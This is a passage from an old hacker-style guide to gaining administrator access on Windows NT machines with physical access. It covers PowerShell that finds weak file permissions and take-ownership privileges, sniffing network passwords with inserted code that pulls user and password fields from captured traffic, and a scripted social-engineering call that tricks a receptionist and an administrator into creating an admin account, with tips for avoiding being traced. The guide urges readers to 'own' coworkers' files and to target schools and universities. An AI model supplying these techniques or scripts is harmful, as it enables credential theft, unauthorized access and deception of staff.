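                $_.IdentityReference.Value -match $who -and
                $_.FileSystemRights.ToString() -match $weak
            })
            if ($hits.Count -gt 0) {
                [pscustomobject]@{
                    Path      = $item.FullName
                    Owner     = $acl.Owner
                    GrantedTo = ($hits | ForEach-Object { "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
                }
            }
        }
    }
}

# Usage (the paths are the guide's own targets; adjust for the box):
Get-TokenPrivilege | Where-Object { $_.Name -in 'SeTakeOwnershipPrivilege', 'SeRestorePrivilege', 'SeBackupPrivilege' }
Find-WeakDacl -Path "$env:SystemRoot\repair",
                    "$env:SystemRoot\System32",
                    ([Environment]::GetFolderPath('CommonStartup')) | Format-Table -AutoSize
```

If the first command prints nothing, the account cannot take ownership of anything its DACL does not already allow, and every Setowner attempt reduces to the second list: only the paths it reports are actually exposed.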



So there you have it another way to...



Ok, ok, this little exploit may not get you Admin, but it can take advantage of the whole "ACL" thing, so basically you can own files which don't actually belong to you! So if the Admin was really stupid!! they would place a copy of the SAM (the one which they made with RDISK) into another directory (don't ask me why; I said if they were stupid) and that's where you will pick it up with your new toy :)



So basically use Setowner or Revoke etc. to poke around and 0wn other employees' files, and if you are really lame you can go up to their face and say...........



"y0 1'm a Hax0r and 1 jUsT 0wned ur Phile!" HAHAHHAHAHAH



Well anyway that’s if you are lame....... Let's move on..........







--------------------------------------------------------------------------------







EXPLOIT 10 -SNIFFING



I will make this section short, since sniffers are very advanced and I would have to write a whole guide on the subject. I will get straight to the point. As you know, a sniffer is used to monitor network traffic and debug bad CGI code or look for some form of bug in a server or network. However, they can also be used to catch hundreds of network passwords. How?



Well, if you think about it, a sniffer is recording and logging all the traffic which passes through the network, and that means when someone logs on to the network their user name and password travel as traffic (for an NT domain logon what actually crosses the wire is the LM/NTLM challenge-response rather than the password itself, which L0phtCrack can still crack from a capture; cleartext only turns up for protocols such as telnet, POP3, FTP and HTTP basic auth). So if you arrived early at work, installed a sniffer and configured it correctly, all you have to do is wait and watch the packets of data get logged into the sniffer and bingo! You could end up having half of the network passwords, even the Administrator's! BUT it's not that easy, because sniffers aren't really that easy to set up and install, and some networks are configured totally differently to what the sniffer expects (on a switched network a port only sees its own traffic and broadcasts), so the sniffer could end up sniffing just boring old traffic, or logging the traffic from the wrong network adapter. Also, the fact is that you need to examine the logged data bits carefully, because you won't get something like this...



User: Michelle Trachtenberg



Password: Hackerzrock



You'll either get something like this.........





$%TFR&&HB124T**User:MichelleTrachtenberg*&*(PLH&Y

^^&&^^&&^T^TBBUUJNIUMJPass:Hackerzrule*((OI()I(I

*U*U*HHH ^T^&T^&^&^JU*I(*UU&*Y&Y&Y&TT^^&^&&^^^&^&^T^&

GET\cgijhyunHNYBYHYYHYHYHYHYHB^^&*&*&*(8788772817828127





Or, if the sniffer is programmed to dump the logs in hex format, it will look something like this......





00 0 00 0 0 00 0 0 02332 0 030303 0 .............................

098 77 66 55 4 3 3 2 4 3 34 4 5 4 3 3 .............................





(You would then need to convert this to Text)
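An added example, not code from the original guide, of the two chores the listings above describe: turning a sniffer's hex dump back into bytes, and pulling "User:"/"Pass:" style fields out of a raw stream even when binary noise surrounds them or a field straddles two dump lines. Both captures in the block are constructed for the example, not real sniffer output; the function names are mine. Assumes Windows PowerShell 5.1 or later.

```powershell
# Added example; not code from the original guide. The two captures below are
# constructed for the example, not real sniffer output.

function ConvertFrom-HexDump {
    # Turn "offset  xx xx xx ...  ascii" dump lines back into the raw bytes.
    # Only the middle column is decoded; the ASCII column is ignored, so a
    # password that happens to look like hex there cannot corrupt the result.
    param([string]$Dump)
    $bytes = New-Object System.Collections.Generic.List[byte]
    foreach ($line in $Dump -split "`r?`n") {
        $cols = $line.Trim() -split '\s{2,}'         # offset | hex bytes | ascii
        if ($cols.Count -lt 2) { continue }
        foreach ($pair in ($cols[1] -split '\s+')) {
            if ($pair -match '^[0-9A-Fa-f]{2}$') { $bytes.Add([Convert]::ToByte($pair, 16)) }
        }
    }
    return ,$bytes.ToArray()
}

function Find-Credential {
    # Scan a byte stream for user/pass style fields. Decoding as ASCII keeps
    # byte offsets aligned with match offsets, and the value class stops at the
    # first byte that is not printable and word-like, so the binary noise around
    # a field is dropped rather than captured.
    param([byte[]]$Bytes)
    $text = [System.Text.Encoding]::ASCII.GetString($Bytes)
    $re   = '(?i)\b(user(name)?|login|pass(word|wd)?)\s*[:=]\s*([A-Za-z0-9._@\\-]{1,64})'
    foreach ($m in [regex]::Matches($text, $re)) {
        [pscustomobject]@{ Offset = $m.Index; Field = $m.Groups[1].Value; Value = $m.Groups[4].Value }
    }
}

# Constructed sample 1: cleartext fields interleaved with binary noise, in the
# style of the first listing above.
$noisy = [System.Text.Encoding]::ASCII.GetBytes('$%TFR&&HB124T**User:MichelleTrachtenberg*&*(PLH&Y^^Pass:Hackerzrule*((OI')
Find-Credential -Bytes $noisy | Format-Table -AutoSize

# Constructed sample 2: the same kind of traffic as a hex dump, with the
# "Pass:" field split across two dump lines.
$dump = @'
0000  55 73 65 72 3a 4d 69 63 68 65 6c 6c 65 0d 0a 50  User:Michelle..P
0010  61 73 73 3a 48 61 63 6b 65 72 7a 72 75 6c 65 0d  ass:Hackerzrule.
0020  0a 47 45 54 20 2f 63 67 69 2d 62 69 6e 2f 20 48  .GET /cgi-bin/ H
'@
Find-Credential -Bytes (ConvertFrom-HexDump -Dump $dump) | Format-Table -AutoSize
```

Reassembling the bytes before searching is the point of the second sample: a line-by-line grep over the dump's ASCII column would never see "Pass:" because "P" sits on one line and "ass:" on the next.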



In conclusion, sniffers are very powerful and dangerous and, if configured and set up correctly, the hacker could be rolling in passwords and personal email messages.



If you plan to actually get Administrator privileges using a sniffer, my advice is to read as many text files on sniffers as possible, learn how the network is set up, then download a bunch of sniffers and experiment with them to see which one suits you. There are millions of sniffers out there and it's up to you to decide which one suits you. It's best to get a freeware one which has a nice GUI and many features as well as being highly configurable. Well, that's all there is to say on sniffers, and remember: you're only capable of hacking the system if you know how the system works.............







--------------------------------------------------------------------------------







EXPLOIT 11 - SOCIAL ENGINEERING



As the final exploit of this guide I am going to end up talking about social engineering. What is social engineering? Well, the nice way to put it is pretending to be someone you're not, but the real way is basically bullshitting!



You have to pretend to be someone you're not; remember that. For example, I'm sure you have all heard of the legend Kevin Mitnick (the super hacker, some might say). Now don't get me wrong, because Mitnick was one of the best hackers and was very clever, BUT he was known as the "master" of social engineering, so he spent a lot of his time getting to know people and tricking them into giving out secret information such as passwords and weaknesses in the system he wished to hack.



I've mentioned Kevin just in case you kiddies out there start thinking "Hahah, that will never work, no one is that dumb!" All I can say to that is "LOOK AT KEVIN MITNICK".........



Ok now for some social engineering examples.......



*NOTE: REMEMBER THESE NEVER REALLY HAPPENED, BUT THEY WORK.......



H = Hacker



MT = Michelle Trachtenberg (The receptionist at www.victim.com)



Picture the scene: you are calling from a phone box, Michelle Trachtenberg is at her reception desk, and it is Monday morning.



The hacker has done his homework, so he knows a bit of info about the company.



The hacker dials the number.........



RING , RING........... RING...... MT: Good morning, welcome to Victim, how may I help you?



H: Oh hello, I'm the computer technician. I was called late last night by your manager and he asked me if I could take a look at your Windows NT workstations; he says you're having trouble.........



MT: Ok can I have your name please?



H: Yes my name is Mike Jones



MT: And what company do you work for?



H: I work for the company XYZ Inc....



MT: What was the name of the manager who contacted you?



H: I don't mean to be rude, lady, but I have a lot of work to do today and I would greatly appreciate it if you would please put me through to your administrator.



MT: Ok, ok I'm sorry but I need to ask these questions for security reasons, you must understand that?



H: Yes, I do, but I'm sure you have a lot of work to do and don't really want to cause any trouble for me or your company, so please would you put me through to your administrator.



MT: Ok. Please hold....



Michelle puts the call on hold and calls up the Administrator......



ADMIN: hello



MT: Oh hi Tom, A Mike Jones would like to talk to you.



ADMIN: Mike Jones?



MT: Yeah, he says he is a computer technician and was phoned late last night because down at the offices you are having trouble.



ADMIN: Mmmm, I don't recall any trouble, but lately the email servers have been playing up, so maybe that is why he was called. Put him through, Michelle.



MT: Ok



Michelle puts Hacker through..........



ADMIN: Hello?



H: Hello, I'm the computer technician and was called late last night because you are having trouble with your workstations.



ADMIN: Oh hello, I wasn't actually expecting anyone, since we haven't really had any trouble lately... But you can never be too safe. Heh, ok, what can I do for you?



H: Could you please create me an account and add me to the local Administrators group? If I'm going to take a look at your workstations it's best I can view them inside out.



ADMIN: Sure, your user will be "Mike.J" and your Password will be...... "PcRePAIR".



H: Ok thanks



ADMIN: Give me 10 minutes to set up your account, and once you are done phone Michelle so you can talk to me and let me know what's wrong; I will then remove your account, ok? Have a nice day.



H: Heh, sure will, and yes, I feel that this is going to be a very good day...



HANGS UP THE PHONE AND NOW 0wns THE NETWORK!



There you have it, and that is how easy it is to get Admin access by social engineering. Let's just go over a few basic skills....





Sound professional; don't use slang

If the receptionist challenges you, use a firmer tone and complain about your heavy workday.

Have a name and company ready, and even the name of a member of staff at Victim.com

If you are fucking up badly, hang up and run!

Always use a payphone; you don't want to risk being traced.

Be confident, don't hesitate







--------------------------------------------------------------------------------







FINAL WORDS



So there you have it, 11 ways to get Admin privileges on a Windows NT box (well, sort of Admin) when you have physical access to the machine. Personally I can't see these exploits working on places like the NAVY, ARMY, NSA etc., but these exploits could help you get admin at places like high schools, universities etc. And to all the fellow administrators out there, I warn you now: if you fall out with or give an employee a hard time you could end up regretting it and be looking at a massive pay loss. My advice to prevent this is pretty simple: "Have a good relationship with your fellow employees". New exploits for Windows NT are discovered all the time, so make sure you update your systems with the latest patches and hotfixes and you should be ok. I think you should try all these exploits (well, the ones you can) on your system and see which ones get you Admin access; then you know which patches to apply.



Thanks for reading, and I hope you learnt something from reading this. If you are having trouble finding these exploits, just wait a couple of months and before you know it I will be releasing an "Exploit Pack" for Windows NT; it will contain all the exploits you have read about in this guide. Well, take care and have fun (or phun, as the hax0rs would say).